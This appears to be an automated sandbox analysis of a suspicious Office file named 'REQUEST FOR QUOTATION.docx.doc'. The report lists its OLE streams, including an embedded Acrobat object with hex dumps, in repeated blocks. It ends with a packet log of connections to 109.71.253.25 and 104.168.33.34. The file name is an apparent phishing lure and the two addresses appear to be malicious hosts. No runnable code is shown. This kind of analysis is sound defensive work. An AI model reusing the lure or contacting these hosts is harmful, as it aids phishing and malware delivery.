Stream Path: CONTENTS, File Type: PDF document, version 1.5, 1 pages (zip deflate encoded), Stream Size: 31606

General
Stream Path:	CONTENTS
CLSID:
File Type:	PDF document, version 1.5, 1 pages (zip deflate encoded)
Stream Size:	31606
Entropy:	7.916695020479147
Base64 Encoded:	True
Data ASCII:	% P D F - 1 . 5 . % . 3 0 o b j . < < / C o l o r S p a c e / D e v i c e G r a y / S u b t y p e / I m a g e / H e i g h t 7 2 / F i l t e r / F l a t e D e c o d e / T y p e / X O b j e c t / W i d t h 2 5 5 / L e n g t h 2 0 8 1 / B i t s P e r C o m p o n e n t 8 > > s t r e a m . x { P . U . & B & o 1 b F P s . R 2 . . . . * Y 6 3 . . # N L 8 T X R \| ( ( " * " < 6 ] . . { n n \| . . s ` . . , b . E . . . q . ( ` o ^ E Y . 7 N Y ] . H X ^ 3 n . . " K . . . . . . * o " . E ( > . . . . . . .
Data Raw:	25 50 44 46 2d 31 2e 35 0a 25 e2 e3 cf d3 0a 33 20 30 20 6f 62 6a 0a 3c 3c 2f 43 6f 6c 6f 72 53 70 61 63 65 2f 44 65 76 69 63 65 47 72 61 79 2f 53 75 62 74 79 70 65 2f 49 6d 61 67 65 2f 48 65 69 67 68 74 20 37 32 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 2f 57 69 64 74 68 20 32 35 35 2f 4c 65 6e 67 74 68 20 32 30 38 31 2f 42 69

OLE File "REQUEST FOR QUOTATION.docx.doc"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	False

Summary

Title:
Subject:
Author:	91974
Keywords:
Template:	Normal.dotm
Last Saved By:	91974
Revion Number:	18
Total Edit Time:	5
Create Time:	2023-11-10T01:33:00Z
Last Saved Time:	2024-05-03T01:42:00Z
Number of Pages:	1
Number of Words:	34
Number of Characters:	194
Creating Application:	Microsoft Office Word
Security:	0

Document Summary

Number of Lines:	1
Number of Paragraphs:	1
Thumbnail Scaling Desired:	false
Company:	Grizli777
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	12.0000

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 94

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	94
Entropy:	4.345966460061678
Base64 Encoded:	False
Data ASCII:	. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x1Ole, File Type: data, Stream Size: 20

General
Stream Path:	\x1Ole
CLSID:
File Type:	data
Stream Size:	20
Entropy:	0.8475846798245739
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . .
Data Raw:	01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x3ObjInfo, File Type: data, Stream Size: 6

General
Stream Path:	\x3ObjInfo
CLSID:
File Type:	data
Stream Size:	6
Entropy:	1.2516291673878228
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	00 00 03 00 01 00

Stream Path: CONTENTS, File Type: PDF document, version 1.5, 1 pages (zip deflate encoded), Stream Size: 30959

General
Stream Path:	CONTENTS
CLSID:
File Type:	PDF document, version 1.5, 1 pages (zip deflate encoded)
Stream Size:	30959
Entropy:	7.915983867366053
Base64 Encoded:	True
Data ASCII:	% P D F - 1 . 5 . % . 3 0 o b j . < < / C o l o r S p a c e / D e v i c e G r a y / S u b t y p e / I m a g e / H e i g h t 7 2 / F i l t e r / F l a t e D e c o d e / T y p e / X O b j e c t / W i d t h 2 5 5 / L e n g t h 2 0 8 1 / B i t s P e r C o m p o n e n t 8 > > s t r e a m . x { P . U . & B & o 1 b F P s . R 2 . . . . * Y 6 3 . . # N L 8 T X R \| ( ( " * " < 6 ] . . { n n \| . . s ` . . , b . E . . . q . ( ` o ^ E Y . 7 N Y ] . H X ^ 3 n . . " K . . . . . . * o " . E ( > . . . . . . .
Data Raw:	25 50 44 46 2d 31 2e 35 0a 25 e2 e3 cf d3 0a 33 20 30 20 6f 62 6a 0a 3c 3c 2f 43 6f 6c 6f 72 53 70 61 63 65 2f 44 65 76 69 63 65 47 72 61 79 2f 53 75 62 74 79 70 65 2f 49 6d 61 67 65 2f 48 65 69 67 68 74 20 37 32 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 2f 57 69 64 74 68 20 32 35 35 2f 4c 65 6e 67 74 68 20 32 30 38 31 2f 42 69

OLE File "REQUEST FOR QUOTATION.docx.doc"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	False

Summary

Title:
Subject:
Author:	91974
Keywords:
Template:	Normal.dotm
Last Saved By:	91974
Revion Number:	18
Total Edit Time:	5
Create Time:	2023-11-10T01:33:00Z
Last Saved Time:	2024-05-03T01:42:00Z
Number of Pages:	1
Number of Words:	34
Number of Characters:	194
Creating Application:	Microsoft Office Word
Security:	0

Document Summary

Number of Lines:	1
Number of Paragraphs:	1
Thumbnail Scaling Desired:	false
Company:	Grizli777
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	12.0000

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 94

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	94
Entropy:	4.345966460061678
Base64 Encoded:	False
Data ASCII:	. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x1Ole, File Type: data, Stream Size: 20

General
Stream Path:	\x1Ole
CLSID:
File Type:	data
Stream Size:	20
Entropy:	0.8475846798245739
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . .
Data Raw:	01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x3ObjInfo, File Type: data, Stream Size: 6

General
Stream Path:	\x3ObjInfo
CLSID:
File Type:	data
Stream Size:	6
Entropy:	1.2516291673878228
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	00 00 03 00 01 00

Stream Path: CONTENTS, File Type: PDF document, version 1.5, 1 pages (zip deflate encoded), Stream Size: 30959

General
Stream Path:	CONTENTS
CLSID:
File Type:	PDF document, version 1.5, 1 pages (zip deflate encoded)
Stream Size:	30959
Entropy:	7.915983867366053
Base64 Encoded:	True
Data ASCII:	% P D F - 1 . 5 . % . 3 0 o b j . < < / C o l o r S p a c e / D e v i c e G r a y / S u b t y p e / I m a g e / H e i g h t 7 2 / F i l t e r / F l a t e D e c o d e / T y p e / X O b j e c t / W i d t h 2 5 5 / L e n g t h 2 0 8 1 / B i t s P e r C o m p o n e n t 8 > > s t r e a m . x { P . U . & B & o 1 b F P s . R 2 . . . . * Y 6 3 . . # N L 8 T X R \| ( ( " * " < 6 ] . . { n n \| . . s ` . . , b . E . . . q . ( ` o ^ E Y . 7 N Y ] . H X ^ 3 n . . " K . . . . . . * o " . E ( > . . . . . . .
Data Raw:	25 50 44 46 2d 31 2e 35 0a 25 e2 e3 cf d3 0a 33 20 30 20 6f 62 6a 0a 3c 3c 2f 43 6f 6c 6f 72 53 70 61 63 65 2f 44 65 76 69 63 65 47 72 61 79 2f 53 75 62 74 79 70 65 2f 49 6d 61 67 65 2f 48 65 69 67 68 74 20 37 32 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 2f 57 69 64 74 68 20 32 35 35 2f 4c 65 6e 67 74 68 20 32 30 38 31 2f 42 69

OLE File "REQUEST FOR QUOTATION.docx.doc"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	False

Summary

Title:
Subject:
Author:	91974
Keywords:
Template:	Normal.dotm
Last Saved By:	91974
Revion Number:	18
Total Edit Time:	5
Create Time:	2023-11-10T01:33:00Z
Last Saved Time:	2024-05-03T01:42:00Z
Number of Pages:	1
Number of Words:	34
Number of Characters:	194
Creating Application:	Microsoft Office Word
Security:	0

Document Summary

Number of Lines:	1
Number of Paragraphs:	1
Thumbnail Scaling Desired:	false
Company:	Grizli777
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	12.0000

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 94

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	94
Entropy:	4.345966460061678
Base64 Encoded:	False
Data ASCII:	. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x1Ole, File Type: data, Stream Size: 20

General
Stream Path:	\x1Ole
CLSID:
File Type:	data
Stream Size:	20
Entropy:	0.8475846798245739
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . .
Data Raw:	01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x3ObjInfo, File Type: data, Stream Size: 6

General
Stream Path:	\x3ObjInfo
CLSID:
File Type:	data
Stream Size:	6
Entropy:	1.2516291673878228
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	00 00 03 00 01 00

Stream Path: CONTENTS, File Type: PDF document, version 1.5, 1 pages (zip deflate encoded), Stream Size: 30959

General
Stream Path:	CONTENTS
CLSID:
File Type:	PDF document, version 1.5, 1 pages (zip deflate encoded)
Stream Size:	30959
Entropy:	7.915983867366053
Base64 Encoded:	True
Data ASCII:	% P D F - 1 . 5 . % . 3 0 o b j . < < / C o l o r S p a c e / D e v i c e G r a y / S u b t y p e / I m a g e / H e i g h t 7 2 / F i l t e r / F l a t e D e c o d e / T y p e / X O b j e c t / W i d t h 2 5 5 / L e n g t h 2 0 8 1 / B i t s P e r C o m p o n e n t 8 > > s t r e a m . x { P . U . & B & o 1 b F P s . R 2 . . . . * Y 6 3 . . # N L 8 T X R \| ( ( " * " < 6 ] . . { n n \| . . s ` . . , b . E . . . q . ( ` o ^ E Y . 7 N Y ] . H X ^ 3 n . . " K . . . . . . * o " . E ( > . . . . . . .
Data Raw:	25 50 44 46 2d 31 2e 35 0a 25 e2 e3 cf d3 0a 33 20 30 20 6f 62 6a 0a 3c 3c 2f 43 6f 6c 6f 72 53 70 61 63 65 2f 44 65 76 69 63 65 47 72 61 79 2f 53 75 62 74 79 70 65 2f 49 6d 61 67 65 2f 48 65 69 67 68 74 20 37 32 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 2f 57 69 64 74 68 20 32 35 35 2f 4c 65 6e 67 74 68 20 32 30 38 31 2f 42 69

OLE File "REQUEST FOR QUOTATION.docx.doc"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	False

Summary

Title:
Subject:
Author:	91974
Keywords:
Template:	Normal.dotm
Last Saved By:	91974
Revion Number:	18
Total Edit Time:	5
Create Time:	2023-11-10T01:33:00Z
Last Saved Time:	2024-05-03T01:42:00Z
Number of Pages:	1
Number of Words:	34
Number of Characters:	194
Creating Application:	Microsoft Office Word
Security:	0

Document Summary

Number of Lines:	1
Number of Paragraphs:	1
Thumbnail Scaling Desired:	false
Company:	Grizli777
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	12.0000

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 94

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	94
Entropy:	4.345966460061678
Base64 Encoded:	False
Data ASCII:	. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x1Ole, File Type: data, Stream Size: 20

General
Stream Path:	\x1Ole
CLSID:
File Type:	data
Stream Size:	20
Entropy:	0.8475846798245739
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . .
Data Raw:	01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x3ObjInfo, File Type: data, Stream Size: 6

General
Stream Path:	\x3ObjInfo
CLSID:
File Type:	data
Stream Size:	6
Entropy:	1.2516291673878228
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	00 00 03 00 01 00

Stream Path: CONTENTS, File Type: PDF document, version 1.5, 1 pages (zip deflate encoded), Stream Size: 30959

General
Stream Path:	CONTENTS
CLSID:
File Type:	PDF document, version 1.5, 1 pages (zip deflate encoded)
Stream Size:	30959
Entropy:	7.915983867366053
Base64 Encoded:	True
Data ASCII:	% P D F - 1 . 5 . % . 3 0 o b j . < < / C o l o r S p a c e / D e v i c e G r a y / S u b t y p e / I m a g e / H e i g h t 7 2 / F i l t e r / F l a t e D e c o d e / T y p e / X O b j e c t / W i d t h 2 5 5 / L e n g t h 2 0 8 1 / B i t s P e r C o m p o n e n t 8 > > s t r e a m . x { P . U . & B & o 1 b F P s . R 2 . . . . * Y 6 3 . . # N L 8 T X R \| ( ( " * " < 6 ] . . { n n \| . . s ` . . , b . E . . . q . ( ` o ^ E Y . 7 N Y ] . H X ^ 3 n . . " K . . . . . . * o " . E ( > . . . . . . .
Data Raw:	25 50 44 46 2d 31 2e 35 0a 25 e2 e3 cf d3 0a 33 20 30 20 6f 62 6a 0a 3c 3c 2f 43 6f 6c 6f 72 53 70 61 63 65 2f 44 65 76 69 63 65 47 72 61 79 2f 53 75 62 74 79 70 65 2f 49 6d 61 67 65 2f 48 65 69 67 68 74 20 37 32 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 2f 57 69 64 74 68 20 32 35 35 2f 4c 65 6e 67 74 68 20 32 30 38 31 2f 42 69

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 6, 2024 14:59:04.166002035 CEST	49161	80	192.168.2.22	109.71.253.25
May 6, 2024 14:59:04.384645939 CEST	80	49161	109.71.253.25	192.168.2.22
May 6, 2024 14:59:04.384788036 CEST	49161	80	192.168.2.22	109.71.253.25
May 6, 2024 14:59:04.385014057 CEST	49161	80	192.168.2.22	109.71.253.25
May 6, 2024 14:59:04.600790977 CEST	80	49161	109.71.253.25	192.168.2.22
May 6, 2024 14:59:04.601027966 CEST	80	49161	109.71.253.25	192.168.2.22
May 6, 2024 14:59:04.601098061 CEST	49161	80	192.168.2.22	109.71.253.25
May 6, 2024 14:59:05.370537996 CEST	49162	80	192.168.2.22	109.71.253.25
May 6, 2024 14:59:05.590492964 CEST	80	49162	109.71.253.25	192.168.2.22
May 6, 2024 14:59:05.590585947 CEST	49162	80	192.168.2.22	109.71.253.25
May 6, 2024 14:59:05.596797943 CEST	49162	80	192.168.2.22	109.71.253.25
May 6, 2024 14:59:05.815851927 CEST	80	49162	109.71.253.25	192.168.2.22
May 6, 2024 14:59:05.815908909 CEST	80	49162	109.71.253.25	192.168.2.22
May 6, 2024 14:59:05.818574905 CEST	49163	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:05.818613052 CEST	443	49163	109.71.253.25	192.168.2.22
May 6, 2024 14:59:05.818730116 CEST	49163	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:05.820529938 CEST	49163	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:05.820544004 CEST	443	49163	109.71.253.25	192.168.2.22
May 6, 2024 14:59:06.025947094 CEST	49162	80	192.168.2.22	109.71.253.25
May 6, 2024 14:59:06.267304897 CEST	443	49163	109.71.253.25	192.168.2.22
May 6, 2024 14:59:06.267406940 CEST	49163	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:06.276396036 CEST	49163	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:06.276417017 CEST	443	49163	109.71.253.25	192.168.2.22
May 6, 2024 14:59:06.276760101 CEST	443	49163	109.71.253.25	192.168.2.22
May 6, 2024 14:59:06.362309933 CEST	49163	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:06.404117107 CEST	443	49163	109.71.253.25	192.168.2.22
May 6, 2024 14:59:06.706301928 CEST	443	49163	109.71.253.25	192.168.2.22
May 6, 2024 14:59:06.706370115 CEST	443	49163	109.71.253.25	192.168.2.22
May 6, 2024 14:59:06.706445932 CEST	49163	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:06.706536055 CEST	49163	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:06.706552029 CEST	443	49163	109.71.253.25	192.168.2.22
May 6, 2024 14:59:06.706594944 CEST	49163	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:06.706602097 CEST	443	49163	109.71.253.25	192.168.2.22
May 6, 2024 14:59:09.605103970 CEST	80	49161	109.71.253.25	192.168.2.22
May 6, 2024 14:59:09.605222940 CEST	49161	80	192.168.2.22	109.71.253.25
May 6, 2024 14:59:10.524419069 CEST	49164	80	192.168.2.22	109.71.253.25
May 6, 2024 14:59:10.743269920 CEST	80	49164	109.71.253.25	192.168.2.22
May 6, 2024 14:59:10.743386984 CEST	49164	80	192.168.2.22	109.71.253.25
May 6, 2024 14:59:10.745825052 CEST	49164	80	192.168.2.22	109.71.253.25
May 6, 2024 14:59:10.820394039 CEST	80	49162	109.71.253.25	192.168.2.22
May 6, 2024 14:59:10.820472002 CEST	49162	80	192.168.2.22	109.71.253.25
May 6, 2024 14:59:10.820535898 CEST	49162	80	192.168.2.22	109.71.253.25
May 6, 2024 14:59:10.964458942 CEST	80	49164	109.71.253.25	192.168.2.22
May 6, 2024 14:59:10.964819908 CEST	80	49164	109.71.253.25	192.168.2.22
May 6, 2024 14:59:10.965337992 CEST	49165	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:10.965379953 CEST	443	49165	109.71.253.25	192.168.2.22
May 6, 2024 14:59:10.965447903 CEST	49165	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:10.966149092 CEST	49165	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:10.966161966 CEST	443	49165	109.71.253.25	192.168.2.22
May 6, 2024 14:59:11.039453030 CEST	80	49162	109.71.253.25	192.168.2.22
May 6, 2024 14:59:11.173960924 CEST	49164	80	192.168.2.22	109.71.253.25
May 6, 2024 14:59:11.408687115 CEST	443	49165	109.71.253.25	192.168.2.22
May 6, 2024 14:59:11.408759117 CEST	49165	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:11.412600040 CEST	49165	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:11.412609100 CEST	443	49165	109.71.253.25	192.168.2.22
May 6, 2024 14:59:11.412949085 CEST	443	49165	109.71.253.25	192.168.2.22
May 6, 2024 14:59:11.426492929 CEST	49165	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:11.472116947 CEST	443	49165	109.71.253.25	192.168.2.22
May 6, 2024 14:59:11.859354019 CEST	443	49165	109.71.253.25	192.168.2.22
May 6, 2024 14:59:11.859431028 CEST	443	49165	109.71.253.25	192.168.2.22
May 6, 2024 14:59:11.859574080 CEST	49165	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:11.859726906 CEST	49165	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:11.859745026 CEST	443	49165	109.71.253.25	192.168.2.22
May 6, 2024 14:59:12.016588926 CEST	49164	80	192.168.2.22	109.71.253.25
May 6, 2024 14:59:12.241651058 CEST	80	49164	109.71.253.25	192.168.2.22
May 6, 2024 14:59:12.437585115 CEST	49164	80	192.168.2.22	109.71.253.25
May 6, 2024 14:59:12.502012014 CEST	49166	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:12.502053976 CEST	443	49166	109.71.253.25	192.168.2.22
May 6, 2024 14:59:12.502118111 CEST	49166	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:12.502389908 CEST	49166	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:12.502402067 CEST	443	49166	109.71.253.25	192.168.2.22
May 6, 2024 14:59:12.942783117 CEST	443	49166	109.71.253.25	192.168.2.22
May 6, 2024 14:59:12.942950964 CEST	49166	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:12.949311018 CEST	49166	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:12.949323893 CEST	443	49166	109.71.253.25	192.168.2.22
May 6, 2024 14:59:12.949630976 CEST	443	49166	109.71.253.25	192.168.2.22
May 6, 2024 14:59:12.950825930 CEST	49166	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:12.992115021 CEST	443	49166	109.71.253.25	192.168.2.22
May 6, 2024 14:59:13.386657000 CEST	443	49166	109.71.253.25	192.168.2.22
May 6, 2024 14:59:13.386725903 CEST	443	49166	109.71.253.25	192.168.2.22
May 6, 2024 14:59:13.386784077 CEST	49166	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:13.390690088 CEST	49166	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:13.390716076 CEST	443	49166	109.71.253.25	192.168.2.22
May 6, 2024 14:59:13.405797005 CEST	49164	80	192.168.2.22	109.71.253.25
May 6, 2024 14:59:13.625000954 CEST	80	49164	109.71.253.25	192.168.2.22
May 6, 2024 14:59:13.625447989 CEST	49167	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:13.625483990 CEST	443	49167	109.71.253.25	192.168.2.22
May 6, 2024 14:59:13.625545979 CEST	49167	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:13.625722885 CEST	49167	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:13.625737906 CEST	443	49167	109.71.253.25	192.168.2.22
May 6, 2024 14:59:13.826045036 CEST	49164	80	192.168.2.22	109.71.253.25
May 6, 2024 14:59:14.068173885 CEST	443	49167	109.71.253.25	192.168.2.22
May 6, 2024 14:59:14.068547964 CEST	49167	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:14.068571091 CEST	443	49167	109.71.253.25	192.168.2.22
May 6, 2024 14:59:14.069124937 CEST	49167	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:14.069129944 CEST	443	49167	109.71.253.25	192.168.2.22
May 6, 2024 14:59:14.517391920 CEST	443	49167	109.71.253.25	192.168.2.22
May 6, 2024 14:59:14.517462969 CEST	443	49167	109.71.253.25	192.168.2.22
May 6, 2024 14:59:14.517507076 CEST	49167	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:14.517739058 CEST	49167	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:14.517762899 CEST	443	49167	109.71.253.25	192.168.2.22
May 6, 2024 14:59:14.556772947 CEST	49161	80	192.168.2.22	109.71.253.25
May 6, 2024 14:59:14.556982994 CEST	49168	80	192.168.2.22	109.71.253.25
May 6, 2024 14:59:14.772608995 CEST	80	49161	109.71.253.25	192.168.2.22
May 6, 2024 14:59:14.775286913 CEST	80	49168	109.71.253.25	192.168.2.22
May 6, 2024 14:59:14.775362968 CEST	49168	80	192.168.2.22	109.71.253.25
May 6, 2024 14:59:14.775495052 CEST	49168	80	192.168.2.22	109.71.253.25
May 6, 2024 14:59:14.993872881 CEST	80	49168	109.71.253.25	192.168.2.22
May 6, 2024 14:59:14.993972063 CEST	80	49168	109.71.253.25	192.168.2.22
May 6, 2024 14:59:14.994079113 CEST	49168	80	192.168.2.22	109.71.253.25
May 6, 2024 14:59:15.008410931 CEST	49169	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:15.008454084 CEST	443	49169	109.71.253.25	192.168.2.22
May 6, 2024 14:59:15.008522987 CEST	49169	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:15.009799957 CEST	49169	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:15.009814024 CEST	443	49169	109.71.253.25	192.168.2.22
May 6, 2024 14:59:15.452430964 CEST	443	49169	109.71.253.25	192.168.2.22
May 6, 2024 14:59:15.452624083 CEST	49169	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:15.456825972 CEST	49169	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:15.456851006 CEST	443	49169	109.71.253.25	192.168.2.22
May 6, 2024 14:59:15.457197905 CEST	443	49169	109.71.253.25	192.168.2.22
May 6, 2024 14:59:15.457247972 CEST	49169	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:15.466664076 CEST	49169	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:15.512128115 CEST	443	49169	109.71.253.25	192.168.2.22
May 6, 2024 14:59:15.901294947 CEST	443	49169	109.71.253.25	192.168.2.22
May 6, 2024 14:59:15.901351929 CEST	49169	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:15.901382923 CEST	443	49169	109.71.253.25	192.168.2.22
May 6, 2024 14:59:15.901406050 CEST	443	49169	109.71.253.25	192.168.2.22
May 6, 2024 14:59:15.901427031 CEST	49169	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:15.901446104 CEST	49169	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:15.902333021 CEST	49169	443	192.168.2.22	109.71.253.25
May 6, 2024 14:59:15.902365923 CEST	443	49169	109.71.253.25	192.168.2.22
May 6, 2024 14:59:15.916809082 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.079526901 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.079603910 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.079720974 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.246083021 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.246104002 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.246114969 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.246128082 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.246143103 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.246145010 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.246157885 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.246170998 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.246182919 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.246182919 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.246182919 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.246187925 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.246195078 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.246201038 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.246213913 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:16.246216059 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.246216059 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.246239901 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.246248007 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:16.251705885 CEST	49170	80	192.168.2.22	104.168.33.34
